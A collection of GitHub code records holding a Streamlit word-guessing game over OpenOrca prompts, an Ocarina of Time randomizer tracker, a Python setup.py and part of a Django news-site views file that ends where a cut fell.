+{"seq_id":"6967240168","text":"# STREAMLIT Part\nimport streamlit as st\nimport random\nimport re\nimport time\n\nfrom datasets import load_dataset\n\ndataset = load_dataset(\"Open-Orca/OpenOrca\", split=\"train\")\n\n\ndef replace_random_word(text, replacement=\"\"):\n # Splitting the text into words\n words = text.split()\n # Get the indices of the words which are at least 6 letters long\n long_word_indices = [i for i, word in enumerate(words) if len(word) >= 5]\n # If there are no long words, return None and original sentence\n if not long_word_indices:\n return None, text\n # Choose a random index from the long words\n random_index = random.choice(long_word_indices)\n # Save the word to be replaced\n replaced_word = words[random_index]\n # Replace the word\n words[random_index] = replacement\n # Join the words back into a single string\n modified_text = ' '.join(words)\n # Return the replaced word and the modified text\n return replaced_word, modified_text\n\n\ndef pick_random_prompt():\n while True:\n # Randomly pick a data point\n datapt = random.choice(dataset)\n\n # If 'question' is shorter than 273 characters\n if len(datapt['question']) < 273:\n\n # Replace random word\n replaced_word, modified_text = replace_random_word(\n datapt['question'])\n response = datapt['response']\n # Return the results\n return replaced_word, modified_text, response\n\n\ndef check_guess(secret_word, guess):\n # Initialize a list of 'gray' for each letter in the guess.\n result = []\n for n in range(len(guess)):\n result.append({'letter': guess[n], 'color': 'gray'})\n\n # Initialize a list to keep track of which letters in the secret word have been used.\n used = [False] * len(secret_word)\n\n # First, check for letters in the correct position.\n for m in range(len(guess)):\n if guess[m] == secret_word[m]:\n # The letter is correct and in the correct position.\n result[m]['color'] = 'green'\n used[m] = True\n\n # Then, check for letters in the wrong position.\n for l in range(len(guess)):\n if result[l]['color'] == 'gray' and guess[l] in secret_word and not used[secret_word.index(guess[l])]:\n # The letter is correct but in the wrong position.\n result[l]['color'] = 'yellow'\n used[secret_word.index(guess[l])] = True\n\n return result\n\n\ndef generate_feedback_html(feedback, guess):\n # Encapsulate the feedback display in a function for reuse\n feedback_html = \"\"\n for i, color in enumerate(feedback):\n block_color = 'lime' if color['color'] == 'green' else 'yellow' if color['color'] == 'yellow' else 'lightgray'\n feedback_html += f'
{guess[i]}
'\n feedback_html += \"
\"\n return feedback_html\n\n\ndef sanitize_input(input_string):\n # Remove leading/trailing whitespace and convert to lowercase\n sanitized_input = input_string.strip().lower()\n # Ensure input only contains alphabetic characters\n if re.match(\"^[a-z]*$\", sanitized_input):\n return sanitized_input\n else:\n return \"\"\n\n\ndef message_html(msg, color='gray'):\n return f\"\"\"\n \n {msg}\n
\n \"\"\"\n\n\ndef main():\n st.title('LLM Wordle')\n\n st.write(\"Guess the word in 6 tries or less!\")\n # Create two columns for the Wordle game and the chat.\n game_col, chat_col = st.columns(2)\n game_col.write(\"## Prompt\")\n # Initialize session state variables.\n if 'secret_word' not in st.session_state:\n replaced_word, modified_prompt, response = pick_random_prompt()\n st.session_state.secret_word = replaced_word\n st.session_state.prompt = modified_prompt\n st.session_state.response = response\n if 'guesses' not in st.session_state:\n st.session_state.guesses = []\n if 'feedbacks' not in st.session_state:\n st.session_state.feedbacks = []\n if 'input_key' not in st.session_state:\n st.session_state.input_key = \"input\"\n if 'game_over' not in st.session_state:\n st.session_state.game_over = False\n if 'chat_history' not in st.session_state:\n st.session_state.chat_history = []\n\n # Handle play again logic.\n if st.session_state.game_over:\n if game_col.button(\"Play again? click twice\"):\n st.session_state.game_over = False\n replaced_word, modified_prompt, response = pick_random_prompt()\n st.session_state.secret_word = replaced_word\n st.session_state.prompt = modified_prompt\n st.session_state.response = response\n st.session_state.guesses = []\n st.session_state.feedbacks = []\n st.session_state.chat_history = []\n st.session_state.input_key = \"input\" + \\\n str(random.randint(0, 1000000))\n\n # Check if game is still ongoing.\n if not st.session_state.game_over:\n # Allow the user to enter a guess.\n game_col.write(st.session_state.prompt)\n guess = game_col.text_input(\n \"Enter your guess\", key=st.session_state.input_key)\n guess = sanitize_input(guess) # Sanitize the user input\n\n chat_col.markdown(\"## Response\")\n chat_col.write(st.session_state.response)\n\n # Check the guess.\n if guess in st.session_state.guesses:\n game_col.write(\"You already guessed that word.\")\n elif len(guess) == 0:\n game_col.write(\"Please enter a word.\")\n else:\n feedback = check_guess(st.session_state.secret_word, guess)\n st.session_state.guesses.append(guess)\n st.session_state.feedbacks.append(feedback)\n st.session_state.input_key = \"input\" + \\\n str(random.randint(0, 1000000))\n\n if guess == st.session_state.secret_word:\n game_col.write(\"You win!\")\n st.session_state.game_over = True\n if game_col.button(\"Next\"):\n pass\n elif len(st.session_state.guesses) >= 6:\n game_col.write(\"You lost! the word was \" +\n st.session_state.secret_word)\n st.session_state.game_over = True\n if game_col.button(\"Next\"):\n pass\n\n # Display previous feedbacks\n for past_feedback, past_guess in zip(st.session_state.feedbacks, st.session_state.guesses):\n past_feedback_html = generate_feedback_html(\n past_feedback, past_guess)\n game_col.markdown(past_feedback_html, unsafe_allow_html=True)\n\n for message in st.session_state.chat_history:\n chat_col.markdown(message_html(message, 'purple'),\n unsafe_allow_html=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yemeen/llmwordle","sub_path":"llm_trainer.py","file_name":"llm_trainer.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35456505706","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport sys\nimport re\nimport argparse\nfrom CommonUtils import *\nimport datetime\n\n# Make OoTR work as a submodule in a dir called ./OoT-Randomizer\ntry:\n from World import World\nexcept ModuleNotFoundError:\n ootr_path = os.path.join(os.getcwd(), \"OoT-Randomizer\")\n if ootr_path not in sys.path:\n sys.path.append(ootr_path)\n from World import World\nfrom Utils import data_path\nfrom Dungeon import create_dungeons\nimport ItemPool\nimport TextSettings\nimport EntranceShuffle\nimport SettingsList\nfrom Item import ItemFactory\nfrom Settings import Settings, ArgumentDefaultsHelpFormatter\nfrom Region import TimeOfDay\nimport gui\nimport LocationLogic\nimport InventoryManager\nimport LocationList\n\ndrops_we_are_interested_in = 'Gold Skulltula Token'\n\nclass BadSettingsStringException(Exception):\n pass\n\ndef validate_settings_string(settings_string):\n s = Settings({})\n try:\n s.update_with_settings_string(settings_string)\n except Exception:\n return False\n return True\n\ndef getSettings(input_data, gui_dialog=None):\n parser = argparse.ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')\n\n args = parser.parse_args()\n\n settings = Settings({})\n settings_string = None\n if ('settings_string' in input_data) and (args.settings_string):\n a = expectOne(input_data['settings_string'])\n b = args.settings_string\n if a != b:\n raise Exception(f\"Settings string from arguments ({b}) is different from settings string from save file ({a})\")\n if 'settings_string' in input_data:\n settings_string = expectOne(input_data['settings_string'])\n elif args.settings_string is not None:\n settings_string = args.settings_string\n logging.info(f\"User has provided {settings_string} as the settings string in the arguments\")\n elif gui_dialog:\n settings_string = gui.DialogSettingsManager.get_settings_string()\n input_data['settings_string'] = [settings_string]\n logging.info(f\"User has input {settings_string} as the settings string\")\n if settings_string is None:\n raise Exception(\"Please provide settings_string as an argument or in the text file\")\n\n assert settings_string\n try:\n settings.update_with_settings_string(settings_string)\n except Exception:\n raise BadSettingsStringException(\"{} is not a valid settings string\".format(settings_string))\n if settings.starting_age not in ['child', 'adult']:\n raise Exception(\"Please set starting age to Child or Adult, then try again.\")\n return settings\n\ndef determine_mq_dungeons(world, input_data):\n # What do we know about MQs? 
Replace input data if we know for sure, otherwise maintain input data\n if world.settings.mq_dungeons_mode == 'mq' or (world.settings.mq_dungeons_mode == 'count' and world.settings.mq_dungeons_count == 12):\n input_data['dungeon_mqs'] = list(world.dungeon_mq.keys())\n elif world.settings.mq_dungeons_mode == 'vanilla' or (world.settings.mq_dungeons_mode == 'count' and world.settings.mq_dungeons_count == 0):\n input_data['dungeon_mqs'] = []\n elif world.settings.mq_dungeons_mode == 'specific':\n input_data['dungeon_mqs'] = world.settings.mq_dungeons_specific[:]\n elif 'dungeon_mqs' not in input_data:\n input_data['dungeon_mqs'] = []\n\n for name in world.dungeon_mq:\n world.dungeon_mq[name] = True if name in input_data['dungeon_mqs'] else False\n\ndef determine_trials(world, input_data):\n # What do we know about skipped trials? Replace input data if we know for sure, otherwise maintain input data\n if not world.settings.trials_random and world.settings.trials == 0:\n input_data['skipped_trials'] = list(world.skipped_trials.keys())\n elif not world.settings.trials_random and world.settings.trials == 6:\n input_data['skipped_trials'] = []\n elif 'skipped_trials' not in input_data:\n input_data['skipped_trials'] = []\n\n for key in world.skipped_trials.keys():\n world.skipped_trials[key] = key in input_data['skipped_trials']\n\ndef determine_dungeon_shortcuts(world, input_data):\n # What do we know about dungeon shortcuts? Replace input data if we know for sure, otherwise maintain input data\n if world.settings.dungeon_shortcuts_choice == 'choice':\n input_data['dungeon_shortcuts'] = world.settings.dungeon_shortcuts[:]\n elif world.settings.dungeon_shortcuts_choice == 'all':\n input_data['dungeon_shortcuts'] = list(world.dungeon_mq.keys())\n elif world.settings.dungeon_shortcuts_choice == 'off':\n input_data['dungeon_shortcuts'] = []\n elif 'dungeon_shortcuts' not in input_data:\n input_data['dungeon_shortcuts'] = []\n\n world.settings.dungeon_shortcuts = input_data['dungeon_shortcuts'][:]\n\ndef determine_empty_dungeons(world, input_data):\n # What do we know about dungeon shortcuts? 
Replace input data if we know for sure, otherwise maintain input data\n if world.settings.empty_dungeons_mode == 'specific':\n input_data['empty_dungeons'] = world.settings.empty_dungeons_specific[:]\n elif world.settings.empty_dungeons_mode == 'none':\n input_data['empty_dungeons'] = []\n elif 'empty_dungeons' not in input_data:\n input_data['empty_dungeons'] = []\n\n world.settings.empty_dungeons_specific = input_data['empty_dungeons'][:]\n\ndef generate(input_data, gui_dialog):\n settings = getSettings(input_data, gui_dialog=gui_dialog)\n\n for trick in SettingsList.logic_tricks.values():\n settings.__dict__[trick['name']] = trick['name'] in settings.allowed_tricks\n\n worlds = []\n for i in range(0, settings.world_count):\n worlds.append(World(i, settings, resolveRandomizedSettings=False))\n worlds[-1].ensure_tod_access = False\n\n for id, world in enumerate(worlds):\n determine_mq_dungeons(world, input_data)\n determine_trials(world, input_data)\n determine_dungeon_shortcuts(world, input_data)\n determine_empty_dungeons(world, input_data)\n\n # Compile the json rules based on settings\n world.ensure_tod_access=True\n\n # Load common json rule files (those used regardless of MQ status)\n if settings.logic_rules == 'glitched':\n path = 'Glitched World'\n else:\n path = 'World'\n path = data_path(path)\n\n for filename in ('Overworld.json', 'Bosses.json'):\n world.load_regions_from_json(os.path.join(path, filename))\n\n create_dungeons(world)\n world.create_internal_locations()\n\n # Populate drop items\n drop_locations = list(filter(lambda loc: loc.type == 'Drop', world.get_locations()))\n for drop_location in drop_locations:\n world.push_item(drop_location, ItemFactory(drop_location.vanilla_item, world))\n drop_location.locked = True\n # Populate fixed location items\n ItemPool.junk_pool[:] = list(ItemPool.junk_pool_base)\n if world.settings.junk_ice_traps == 'on':\n ItemPool.junk_pool.append(('Ice Trap', 10))\n elif world.settings.junk_ice_traps in ['mayhem', 'onslaught']:\n ItemPool.junk_pool[:] = [('Ice Trap', 1)]\n (pool, placed_items) = ItemPool.get_pool_core(world)\n placed_items_count = {}\n #world.itempool = ItemFactory(pool, world)\n placed_locations = list(filter(lambda loc: loc.name in placed_items, world.get_locations()))\n for location in placed_locations:\n item = placed_items[location.name]\n placed_items_count[item] = placed_items_count.get(item, 0) + 1\n world.push_item(location, ItemFactory(item, world))\n world.get_location(location).locked = True\n a = LocationList.location_table\n\n if settings.empty_dungeons_mode == 'specific':\n for k,v in LocationList.location_table.items():\n empty = False\n for dungeon in settings.empty_dungeons_specific:\n if v[5] and dungeon in v[5]:\n empty = True\n break\n if empty:\n try:\n location = world.get_location(k)\n world.push_item(location, ItemFactory('Recovery Heart', world))\n location.locked = True\n except KeyError:\n pass\n\n return world\n\n# This is very similar to Search._expand_regions()\n# Try to access all exits we have not been able to access yet\n# Output a number of changes and a list of failed exits to potentially re-try again\n# Also add any reached_regions to the list and any exits that need exploring to the list\ndef filterRegions(exit_queue, world, age, reached_regions, please_explore=True):\n failed = []\n changes = 0\n\n for exit in exit_queue:\n if exit.shuffled:\n if please_explore and exit.access_rule(world.state, spot=exit, age=age):\n exit.please_explore = True\n changes += 1\n else:\n 
failed.append(exit)\n continue\n\n destination = world.get_region(exit.connected_region)\n if destination in reached_regions:\n continue\n if exit.access_rule(world.state, spot=exit, age=age):\n changes += 1\n reached_regions[destination] = destination.provides_time\n reached_regions[world.get_region('Root')] |= destination.provides_time\n exit_queue.extend(destination.exits)\n else:\n failed.append(exit)\n return changes, failed\n\nitem_events = {\n 'Stop GC Rolling Goron as Adult from Goron City': 'Stop GC Rolling Goron as Adult',\n 'Odd Mushroom Access from Lost Woods' : 'Odd Mushroom Access',\n 'Poachers Saw Access from Lost Woods' : 'Poachers Saw Access',\n 'Eyedrops Access from LH Lab' : 'Eyedrops Access',\n 'Broken Sword Access from GV Fortress Side' : 'Broken Sword Access',\n 'Cojiro Access from Kakariko Village' : 'Cojiro Access',\n 'Odd Potion Access from Kak Odd Medicine Building' : 'Odd Potion Access',\n 'Prescription Access from Death Mountain Summit' : 'Prescription Access',\n 'Eyeball Frog Access from Zoras Domain' : 'Eyeball Frog Access',\n}\n\ndef doWeWantThisLoc(loc, world):\n # Deku scrubs that don't have upgrades can be ignored, but not if scrub shuffle or grotto shuffle is on\n if world.settings.shuffle_scrubs == 'off' and not world.settings.shuffle_grotto_entrances:\n if loc.filter_tags and 'Deku Scrub' in loc.filter_tags and 'Deku Scrub Upgrades' not in loc.filter_tags:\n return False\n # Generic grottos with chests are assumed to be looted immediately when you find a grotto, so ignore them\n if world.settings.shuffle_grotto_entrances:\n if loc.filter_tags and 'Grottos' in loc.filter_tags and loc.rule_string == 'True':\n return False\n # Ignore cows if cowsanity is off\n if not world.settings.shuffle_cows:\n if loc.filter_tags and 'Cow' in loc.filter_tags:\n return False\n return True\n\n# Very similar to Search.iter_reachable_locations\n# Go through the list of locked_locations and move them to the possible_locations list if accessible\ndef filterLocations(locked_locations, possible_locations, reachable_regions, state, age, world):\n changes = 0\n\n # Filter the list without removing from locked_locations\n reach_these = []\n for loc in locked_locations:\n if loc.parent_region not in reachable_regions:\n continue\n if not loc.access_rule(state, spot=loc, age=age):\n continue\n changes += 1\n if loc.name in item_events:\n state.prog_items[item_events[loc.name]] += 1\n reach_these.append(loc)\n\n # Now move items from one list to the other\n for loc in reach_these:\n locked_locations.remove(loc)\n if doWeWantThisLoc(loc, world):\n possible_locations.append(loc)\n\n return changes\n\n# If the item type is an event, fixed location, or drop, collect it automatically\ndef autocollect(possible_locations, collected_locations, state):\n collect_items = []\n move_locs = []\n\n for loc in possible_locations:\n if loc.name == 'Ganon':\n # Don't hide the wincon!\n continue\n if loc.locked and loc.item.name not in drops_we_are_interested_in:\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n if loc.type == 'Event':\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n if loc.type in ('HintStone', 'Drop'):\n if loc.item:\n collect_items.append(loc.item.name)\n move_locs.append(loc)\n continue\n\n for item in collect_items:\n state.prog_items[item] += 1\n for loc in move_locs:\n possible_locations.remove(loc)\n collected_locations.append(loc)\n\n return len(move_locs)\n\ndef solve(world, prog_items, starting_region='Root'):\n root_region 
= world.get_region(starting_region)\n reached_regions = {'child': {root_region:TimeOfDay.NONE},\n 'adult': {root_region:TimeOfDay.NONE}}\n all_locations = [x for region in world.regions for x in region.locations]\n locked_locations=all_locations[:]\n possible_locations=[]\n collected_locations=[]\n allkeys_possible_locations = []\n queues = {'child': [exit for exit in root_region.exits],\n 'adult': [exit for exit in root_region.exits]}\n\n # Provide an implementation of world.state.search.can_reach\n world.state.search = SearchClass(world, reached_regions)\n\n world.state.prog_items = prog_items.copy()\n InventoryManager.add_free_items(world, world.state.prog_items)\n\n # Map traversal\n changes = 1\n while changes:\n changes = 0\n\n for age in ['adult', 'child']:\n add_changes, queues[age] = filterRegions(queues[age], world, age, reached_regions[age], please_explore=True)\n changes += add_changes\n changes += filterLocations(locked_locations, possible_locations, reached_regions[age], world.state, age, world)\n\n changes += autocollect(possible_locations, collected_locations, world.state)\n\n if world.settings.shuffle_smallkeys in ['vanilla', 'dungeon']:\n # Give max small keys and try again, to see which locations are \"ignore small key logic\" possible\n allkeys_possible_locations = possible_locations.copy()\n allkeys_reached_regions = { 'child':reached_regions['child'].copy(),\n 'adult':reached_regions['adult'].copy()}\n key_amounts = InventoryManager.get_small_key_limits(world)\n # Free keys are given to fix the logic sometimes. So instead of comparing the current prog items,\n # Compare the base prog items amount with expected\n for key, amount in key_amounts.items():\n difference = amount - prog_items[key]\n if difference > 0:\n world.state.prog_items[key] += difference\n changes = 1\n while changes:\n changes = 0\n\n for age in ['adult', 'child']:\n add_changes, queues[age] = filterRegions(queues[age], world, age, allkeys_reached_regions[age], please_explore=False)\n changes += add_changes\n changes += filterLocations(locked_locations, allkeys_possible_locations, allkeys_reached_regions[age], world.state, age, world)\n\n changes += autocollect(allkeys_possible_locations, collected_locations, world.state)\n\n return {'possible_locations':possible_locations, 'adult_reached':reached_regions['adult'], 'child_reached':reached_regions['child'], 'allkeys_possible_locations':allkeys_possible_locations}\n\ndef get_shuffled_exits(settings):\n settings_to_types_dict = {\n 'shuffle_grotto_entrances': ['Grotto', 'Grave'],\n 'shuffle_overworld_entrances': ['Overworld'],\n 'owl_drops': ['OwlDrop'],\n 'warp_songs': ['WarpSong'],\n 'spawn_positions': ['Spawn'],\n }\n shuffled_types = []\n\n for setting, types in settings_to_types_dict.items():\n if getattr(settings, setting):\n shuffled_types.extend(types)\n\n interior_options_dict = {\n 'off': [],\n 'simple': ['Interior'],\n 'all': ['Interior', 'SpecialInterior'],\n }\n shuffled_types.extend(interior_options_dict[settings.shuffle_interior_entrances])\n\n # Complex exceptions\n if 'Grave' in shuffled_types and 'SpecialInterior' in shuffled_types:\n shuffled_types.append('SpecialGrave')\n\n if settings.shuffle_bosses != 'off':\n shuffled_types.extend(['ChildBoss', 'AdultBoss'])\n if settings.shuffle_dungeon_entrances in ['simple', 'all']:\n shuffled_types.append('Dungeon')\n if settings.shuffle_dungeon_entrances in ['all']:\n shuffled_types.append('DungeonSpecial')\n\n shuffle_these = set()\n for x in EntranceShuffle.entrance_shuffle_table:\n if x[0] 
not in shuffled_types:\n continue\n assert len(x) >= 2\n assert len(x) <= 3\n if len(x) == 2 and x[0] == 'Overworld' and not getattr(settings, 'decouple_entrances', False):\n # The GV Lower Stream -> Lake Hylia exit isn't shuffled unless the exits are decoupled\n continue\n shuffle_these.add(x[1][0])\n if len(x) > 2:\n shuffle_these.add(x[2][0])\n\n return shuffle_these\n\n# Mark all exits shuffled that would be shuffled according to the settings\ndef shuffleExits(world):\n shuffle_these = get_shuffled_exits(world.settings)\n all_exits = [x for region in world.regions for x in region.exits]\n for x in all_exits:\n if x.name in shuffle_these:\n x.shuffled = True\n if 'Boss Room' in x.connected_region and not x.shuffled:\n # Unshuffled boss rooms need their hint areas marked\n other_region = world.get_region(x.connected_region)\n other_region.dungeon = x.parent_region.dungeon\n\n#What to display to the user as un-collected items\ntotal_equipment = ItemPool.item_groups['ProgressItem'] + ItemPool.item_groups['Song'] + ItemPool.item_groups['DungeonReward'] + [\n'Small Key (Bottom of the Well)',\n'Small Key (Forest Temple)',\n'Small Key (Fire Temple)',\n'Small Key (Water Temple)',\n'Small Key (Shadow Temple)',\n'Small Key (Spirit Temple)',\n'Small Key (Gerudo Fortress)',\n'Small Key (Gerudo Training Ground)',\n'Small Key (Ganons Castle)',\n'Boss Key (Forest Temple)',\n'Boss Key (Fire Temple)',\n'Boss Key (Water Temple)',\n'Boss Key (Shadow Temple)',\n'Boss Key (Spirit Temple)',\n'Boss Key (Ganons Castle)',\n'Bombchu Drop',\n'Zeldas Letter',\n'Weird Egg',\n'Rutos Letter',\n'Gerudo Membership Card',\n'Deku Stick Capacity',\n'Deku Shield',\n'Gold Skulltula Token',\n'Hylian Shield',\n] + list(ItemPool.trade_items)\n\ndef getInputData(filename):\n try:\n input_data = TextSettings.readFromFile(filename)\n except FileNotFoundError:\n input_data = {}\n\n # Make some input data empty lists if they are not present\n for key in ['equipment', 'checked_off', 'one_wallet', 'two_wallets', 'known_exits', 'paired_exits']:\n if key not in input_data:\n input_data[key] = []\n\n # Remove trailing whitespace\n for key in ['checked_off', 'one_wallet', 'two_wallets']:\n input_data[key] = [re.sub(\"\\s*$\", \"\", x) for x in input_data[key]]\n\n # If any of the exits in please_explore have had their \"?\" replaced with a name, consider them a known_exits instead\n if 'please_explore' in input_data:\n migrate_these = [x for x in input_data['please_explore'] if not x.endswith(\"?\")]\n for x in migrate_these:\n input_data['please_explore'].remove(x)\n input_data['known_exits'].append(x)\n return input_data\n\nclass SearchClass():\n def __init__(self, world, reached_regions):\n self.world = world\n self.reached_regions = reached_regions\n\n def can_reach(self, region, age, tod):\n assert tod in [TimeOfDay.DAY, TimeOfDay.DAMPE]\n\n if self.reached_regions[age][region] & tod:\n return True\n\n return self.propagate_tod(self.reached_regions[age], age, tod, goal_region=region)\n\n def propagate_tod(self, regions, age, tod, goal_region):\n exit_queue = []\n for region in regions:\n if not regions[region] & tod:\n continue\n exit_queue.extend(region.exits)\n\n while len(exit_queue):\n exit = exit_queue.pop(0)\n\n if exit.shuffled:\n continue\n destination = self.world.get_region(exit.connected_region)\n if destination not in regions:\n continue\n if regions[destination] & tod:\n continue\n if exit.access_rule(self.world.state, spot=exit, age=age, tod=tod):\n regions[destination] |= tod\n if destination == goal_region:\n return 
True\n exit_queue.extend(destination.exits)\n return False\n\ndef startWorldBasedOnData(input_data, gui_dialog):\n world = generate(input_data, gui_dialog=gui_dialog)\n\n LocationLogic.populateKnownUnshuffled(world)\n\n # Fix the bug in World.py code\n max_tokens = 0\n if world.settings.bridge == 'tokens':\n max_tokens = max(max_tokens, world.settings.bridge_tokens)\n if world.settings.lacs_condition == 'tokens':\n max_tokens = max(max_tokens, world.settings.lacs_tokens)\n tokens = [50, 40, 30, 20, 10]\n for t in tokens:\n if f'Kak {t} Gold Skulltula Reward' not in world.settings.disabled_locations:\n max_tokens = max(max_tokens, t)\n world.max_progressions['Gold Skulltula Token'] = max_tokens\n\n # Populate starting equipment into state.prog_items\n for x in input_data['equipment']:\n world.state.prog_items[x] += 1\n if x == 'Deku Shield':\n world.state.prog_items['Buy Deku Shield'] += 1\n elif x == 'Deku Stick Capacity':\n world.state.prog_items['Deku Stick Drop'] += 1\n elif x == 'Hylian Shield':\n world.state.prog_items['Buy Hylian Shield'] += 1\n\n # Shuffle any shuffled exits, and fill in any explored exits\n shuffleExits(world)\n\n # Set price rules that we have enabled\n for name in input_data['one_wallet']:\n loc = world.get_location(name)\n wallet1 = world.parser.parse_rule('(Progressive_Wallet, 1)')\n loc.add_rule(wallet1)\n for name in input_data['two_wallets']:\n loc = world.get_location(name)\n wallet2 = world.parser.parse_rule('(Progressive_Wallet, 2)')\n loc.add_rule(wallet2)\n\n return world\n\ndef possibleLocToString(loc, world, child_reached, adult_reached):\n # TODO: see if using the subrules can be refined here?\n child = loc.parent_region in child_reached and loc.access_rule(world.state, spot=loc, age='child')\n adult = loc.parent_region in adult_reached and loc.access_rule(world.state, spot=loc, age='adult')\n assert child or adult\n\n if child and adult:\n message = \"(child or adult)\"\n elif child:\n message = \"(child)\"\n else:\n message = \"(adult)\"\n return \"{} (in {}) {}\".format(loc, loc.parent_region, message)\n\ndef writeResultsToFile(world, input_data, output_data, output_known_exits, filename, output_known_exit_pairs, priorities=None):\n # Propagate input data to output\n for key in ['equipment', 'checked_off', 'one_wallet', 'two_wallets', 'dungeon_mqs']:\n output_data[key] = input_data[key]\n output_data['settings_string'] = [world.settings.settings_string]\n\n # Build possible equipment list as a suggestion for items which have not been collected yet\n possible_equipment = total_equipment[:]\n for x in output_data['equipment']:\n try:\n possible_equipment.remove(x)\n except ValueError:\n pass\n output_data['possible_equipment'] = possible_equipment\n\n # Find the names of the possible locations (minus the checked off ones)\n # Then reconstruct their order using the master list\n p = set([x.name for x in output_data['possible_locations']])\n for name in input_data['checked_off']:\n try:\n p.remove(name)\n except KeyError:\n pass\n locs = [x for x in world.get_locations() if x.name in p]\n output_data['possible_locations'] = [possibleLocToString(x, world, output_data['child_reached'], output_data['adult_reached']) for x in locs]\n\n # Turn the known_exits data into formatted text\n #output_data = output_data | exit_information_to_text(all_exits, output_known_exits, output_known_exit_pairs)\n # TODO: clean this up later\n output_data['known_exits'] = output_known_exits\n output_data['paired_exits'] = output_known_exit_pairs\n\n # Output data that we 
don't want\n del output_data['child_reached']\n del output_data['adult_reached']\n\n if priorities is None:\n priorities = [\"settings_string\", \"possible_locations\", \"known_exits\", \"other_shuffled_exits\"]\n TextSettings.writeToFile(output_data, filename, priorities)\n\ndef formatPairedExits(known_exit_twins):\n items = list(known_exit_twins.keys())\n assert len(items) % 2 == 0\n\n result = []\n while len(items):\n item1 = items.pop(0)\n item2 = known_exit_twins[item1]\n items.remove(item2)\n result.append(\"{} pairswith {}\".format(item1, item2))\n\n return result\n\n# Turn the known-exit dictionaries into text\ndef exit_information_to_text(all_exits, known_exits, known_exit_pairs):\n known_exits = [\"{} goesto {}\".format(exit.name, known_exits[exit.name]) for exit in all_exits if exit.name in known_exits and exit.name not in known_exit_pairs]\n paired_exits = formatPairedExits(known_exit_pairs)\n return {'known_exits':known_exits, 'paired_exits':paired_exits}\n\n\ndef textmode(filename):\n input_data = getInputData(filename)\n world, output_known_exits = startWorldBasedOnData(input_data)\n output_data = solve(world)\n writeResultsToFile(world, input_data, output_data, output_known_exits, filename)\n\nif __name__ == \"__main__\":\n # Log to stderr and file\n log_dir = 'Logs'\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n logfile_name = datetime.datetime.now().strftime('logfile_%Y-%m-%d %H-%M-%S.log')\n logfile_name = os.path.join(log_dir, logfile_name)\n logging.basicConfig(handlers=[logging.FileHandler(logfile_name), logging.StreamHandler()], level=logging.INFO)\n\n # Parse command line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--textmode', action=\"store_true\")\n parser.add_argument('--filename', type=str, default=\"output.txt\")\n parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')\n args = parser.parse_args()\n\n # Launch gui or text mode\n if args.textmode:\n textmode(args.filename)\n else:\n gui.main(args.filename)\n","repo_name":"hoodedpaladin/HoodTracker","sub_path":"HoodTracker.py","file_name":"HoodTracker.py","file_ext":"py","file_size_in_byte":27153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"}
+{"seq_id":"23763239711","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nlong_description = \"Datajoint schemata and code for neuroscientific experiments in the Tolias lab.\"\n\n\nsetup(\n name='commons',\n version='0.1.0.dev1',\n description=\"A collection of datajoint schemas and analysis code.\",\n long_description=long_description,\n author='Fabian Sinz',\n author_email='sinz@bcm.edu',\n license=\"Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License\",\n url='https://github.com/atlab/commons',\n keywords='database organization',\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n # dependency_links = ['https://github.com/datajoint/datajoint-python/tarball/master#egg=datajoint-0.1.0beta'],\n install_requires=[],\n classifiers=[\n 'Development Status :: 1 - Beta',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python :: 3 :: Only',\n 'License :: OSI Approved :: Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License',\n 'Topic :: Database :: Front-Ends',\n ],\n)\n","repo_name":"atlab/commons","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4506845208","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.core import serializers\nfrom app1 import models\nimport datetime\nimport json\n# Create your views here.\n\n\ndef Filter(before_func, after_func):\n def outer(main_func):\n def wrapper(request, *args, **kwargs):\n before_result = before_func(request, *args, **kwargs)\n if(before_result != None):\n return before_result\n main_result = main_func(request, *args, **kwargs)\n if(main_result != None):\n return main_result\n after_result = after_func(request, *args, **kwargs)\n if(after_result != None):\n return after_result\n return wrapper\n return outer\n\n\ndef before(request):\n data = {'status': 0, 'message':''}\n if 'current_user_id' not in request.session:\n data['message'] = '请先登录!'\n return HttpResponse(json.dumps(data))\n\n\ndef after(request):\n pass\n\n\ndef login(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n try:\n currentObj = models.Admin.objects.get(username=username,password=password)\n except Exception as e:\n currentObj = None\n if currentObj:\n request.session['current_user_id'] = currentObj.id\n return redirect('/index/')\n else:\n data = {'message': '用户名或密码错误!'}\n return render_to_response('login.html')\n return render_to_response('login.html')\n\n\ndef index(request):\n all_data = models.News.objects.all().order_by('-create_date')\n return render_to_response('index.html',{'data': all_data})\n\n\ndef addfavor(request):\n ret = {'status':0, 'data':'', 'message':''}\n try:\n id = request.POST.get('nid')\n newsObj = models.News.objects.get(id=id)\n temp = newsObj.favor_count + 1\n newsObj.favor_count = temp\n newsObj.save()\n ret['status'] = 1\n ret['data'] = temp\n except Exception as e:\n ret['message'] = e.args\n return HttpResponse(json.dumps(ret))\n\n\nclass CJsonEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, datetime.datetime):\n return o.strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(o, date):\n return o.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, 